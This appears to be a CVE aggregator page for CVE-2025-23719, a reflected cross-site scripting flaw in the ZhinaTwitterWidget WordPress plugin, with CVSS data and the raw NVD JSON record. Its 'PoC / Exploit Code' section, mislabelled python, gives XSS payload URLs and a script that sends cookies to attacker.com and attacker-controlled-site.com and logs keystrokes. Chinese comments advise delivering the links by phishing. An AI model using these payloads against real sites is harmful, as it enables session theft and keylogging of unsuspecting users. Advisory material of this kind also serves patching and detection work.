Security Vulnerability Report
中文
CVE-2025-23719 CVSS 7.1 HIGH

CVE-2025-23719

Published: 2025-12-31 20:15:42
Last Modified: 2026-04-23 15:24:22

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in zckevin ZhinaTwitterWidget zhina-twitter-widget allows Reflected XSS.This issue affects ZhinaTwitterWidget: from n/a through <= 1.0.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

zhina-twitter-widget <= 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-23719 PoC - ZhinaTwitterWidget Reflected XSS --> <!-- 攻击者构造的恶意链接示例 --> <!-- 将以下链接通过钓鱼邮件或社交工程方式发送给目标用户 --> <!-- 基础反射型XSS PoC --> http://target-site.com/wp-content/plugins/zhina-twitter-widget/?q=<script>alert(document.domain)</script> <!-- 窃取Cookie的进阶PoC --> http://target-site.com/wp-content/plugins/zhina-twitter-widget/?q=<script>fetch('https://attacker.com/steal?c='+document.cookie)</script> <!-- 绕过简单过滤的编码变形PoC --> http://target-site.com/wp-content/plugins/zhina-twitter-widget/?q=<img src=x onerror=alert(document.cookie)> http://target-site.com/wp-content/plugins/zhina-twitter-widget/?q=<svg onload=alert(document.domain)> <!-- 完整的攻击脚本示例 --> <script> // 窃取会话并重定向到恶意页面 var stolen_cookies = document.cookie; var attacker_server = 'https://attacker-controlled-site.com/log'; // 发送窃取的Cookie到攻击者服务器 fetch(attacker_server + '?data=' + encodeURIComponent(stolen_cookies)); // 注入键盘记录脚本 document.addEventListener('keypress', function(e) { fetch(attacker_server + '?keylog=' + e.key); }); </script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-23719", "sourceIdentifier": "[email protected]", "published": "2025-12-31T20:15:41.770", "lastModified": "2026-04-23T15:24:21.840", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in zckevin ZhinaTwitterWidget zhina-twitter-widget allows Reflected XSS.This issue affects ZhinaTwitterWidget: from n/a through <= 1.0."}, {"lang": "es", "value": "Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') vulnerabilidad en zckevin ZhinaTwitterWidget permite XSS Reflejado. Este problema afecta a ZhinaTwitterWidget: desde n/d hasta 1.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/zhina-twitter-widget/vulnerability/wordpress-zhinatwitterwidget-plugin-1-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}